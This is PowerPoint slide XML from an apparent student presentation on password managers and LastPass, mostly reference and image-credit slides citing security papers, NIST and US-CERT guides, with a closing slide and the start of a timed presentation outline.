            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Wiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://www.thinkwiki.org/wiki/Embedded_Security_Subsystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Gasti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>, P., &amp; Rasmussen, K. B. (2012). On the security of password manager database formats. </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Computer Security–ESORICS 2012 (pp. 770-787). Springer Berlin Heidelberg.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Huth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>A., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>&amp; Orlando, M &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Pesante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>, L. (2012).  Password security, protection and management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Retrieved from https://www.us-cert.gov/sites/default/files/publications/PasswordMgmt2012.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>. Retrieved April 06, 2015 from Wikipedia Wiki: http://en.wikipedia.org/wiki/LastPass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> 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7124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1794" y="142839"/>
            <a:ext cx="11146220" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>REFERENCES ( Documents )</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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490990" y="1591733"/>
            <a:ext cx="1126782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Li, Z., He, W., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Akhawe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>, D., &amp; Song, D. (2014, July). The emperor's new password manager: Security analysis </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>of web-based password managers. In 23rd USENIX Security Symposium (USENIX Security 14).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>of Password Managers. Retrieved March 07, 2015 from Wikipedia </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Wiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://en.wikipedia.org/wiki/List_of_password_managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Password Manager. Retrieved March 07, 2015 from Wikipedia </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Wiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>en.wikipedia.org/wiki/Password_manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Password Security, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Protection, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Retrieved from https://www.us-cert.gov/sites/default/files/publications/PasswordMgmt2012.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Safford, D. (October, 2002). The Need for TCPA. </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Retrieved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>from http://www.research.ibm.com/gsal/tcpa/why_tcpa.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Sans: Securing the human. (October, 2013). Password managers.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Retrieved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>from http://www.securingthehuman.org/newsletters/ouch/issues/OUCH-201310_en.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA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0708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1794" y="142839"/>
            <a:ext cx="11146220" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>REFERENCES ( Documents )</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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899755" y="1676400"/>
            <a:ext cx="1045029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Scarfone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>, K., &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Souppaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>, M. (2009). Guide to enterprise password management (draft). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>NIST Special Publication, 800, 118.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Silver, D., Jana, S., Chen, E., Jackson, C., &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Boneh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, D. (2014, August). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password managers: Attacks and defenses. In Proceedings of the 23rd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Usenix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Security Symposium.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>User Manual. (2015). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> User Manual.  Retrieved from https://helpdesk.lastpass.com/full.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA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4144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73" y="1620913"/>
            <a:ext cx="5715343" cy="361617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Introduction</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Treat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>your password like your toothbrush. Don't let anybody else use it, and get a new one every six months</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>Clifford Stoll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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7" r="213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896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1794" y="142839"/>
            <a:ext cx="11146220" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>REFERENCES ( Images )</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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622436" y="1536375"/>
            <a:ext cx="1100493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[Image of locks with one unlocked on slide 1]. Retrieved March 07, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://imagebox.com/app/wp-content/uploads/2013/04/158695294.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[Blurb of image text on slide 2]. Retrieved March 07, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://1.bp.blogspot.com/-jmW4OW9kIHw/TZ0GCZIUl_I/AAAAAAAAAD4/YleAKw-8pPg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>s1600/gawker-top-250.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[Image of keyhole with popular website logos on slide 4]. Retrieved April 11, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://1.bp.blogspot.com/-roqm25Xxwfo/VBRp7tpaTjI/AAAAAAAANVg/7j5nIkat4SA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>s1600/lastpass.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[Child on laptop in slide 6]. Retrieved April 20, 2015, from: http://scottebales.com/wp-content/uploads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>2013/01/Early-Adopter.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[Women using red laptop on slide 6]. Retrieved April 20, 2015, from: http://www.qiktechnology.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>-content/uploads/2013/06/Computer-Networking-For-a-Small-Business.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[Business dressed people in slide 6]. Retrieved April 20, 2015, from: http://sanyapharma.in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>-content/uploads/2014/05/enterprise-2.jpg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750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1794" y="142839"/>
            <a:ext cx="11146220" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>REFERENCES ( Images )</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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71003" y="1677051"/>
            <a:ext cx="1210780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[List of password managers on slide 9]. Retrieved March 07, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://en.wikipedia.org/wiki/List_of_password_managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> Logo on slide 11]. Retrieved March 07, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://appistan.pk/wp-content/uploads/2014/03/lastpass-logo.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> founders on slide 12]. Retrieved April 06, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: https://lastpass.com/about-lastpass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> features list on slide 14]. Retrieved April 06, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: https://lastpass.com/features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> video link image on slide 15]. Retrieved March 16, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://1.bp.blogspot.com/-roqm25Xxwfo/VBRp7tpaTjI/AAAAAAAANVg/7j5nIkat4SA/s1600/lastpass.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[AES 256 bit logo on slide 16]. Retrieved April 20, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://vpnhani.com/wp-content/uploads/2015/03/aes.png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1263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1794" y="142839"/>
            <a:ext cx="11146220" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>REFERENCES ( Images )</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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71003" y="1677051"/>
            <a:ext cx="1202765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[Key with keyhole in code on slide 16]. Retrieved April 20, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://hackwhiz.com/wp-content/uploads/2014/08/d5127f18ca406840121e588f13cc5d85.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[Thinking stickman on slide 18]. Retrieved April 11, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://images.clipartpanda.com/thinker-clipart-thinking-person.svg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[Hacker image in code on slide 20]. Retrieved April 20, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://www.bgnnews.com/hackers-controlling-millions-of-pcs-targeted-in-europol-sweep_3802_720_400.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[Comment image on slide 25]. Retrieved March 16, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://www.iconarchive.com/show/blue-bits-icons-by-icojam/chat-comment-icon.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>[Warning options ahead on slide 26]. Retrieved April 20, 2015, </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>: http://www.gameknightreviews.com/wp-content/uploads/2013/12/warning-opinions-ahead.png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3048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5214" y="255134"/>
            <a:ext cx="10783614" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Stay password safe!  Thank you</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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725214" y="2159876"/>
            <a:ext cx="53078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smtClean="0"/>
              <a:t>COMMENTS ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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6527977" y="4830919"/>
            <a:ext cx="51732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 smtClean="0"/>
              <a:t>QUESTIONS ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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65" y="3611719"/>
            <a:ext cx="2438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02" y="1956339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1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1794" y="142839"/>
            <a:ext cx="11146220" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>PRESENTATION OUTLINE</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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204952" y="1671146"/>
            <a:ext cx="53129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-Title Slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>-Presentation Table of Contents Slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	Briefly state the purpose of the presentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	Go over the different sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>-Intro ( 2 min )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	What is a Password Manager - 30 sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	How they work - 1 min</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	Who uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>them and why? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>- 30 sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>-Types of Password Managers ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>min )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
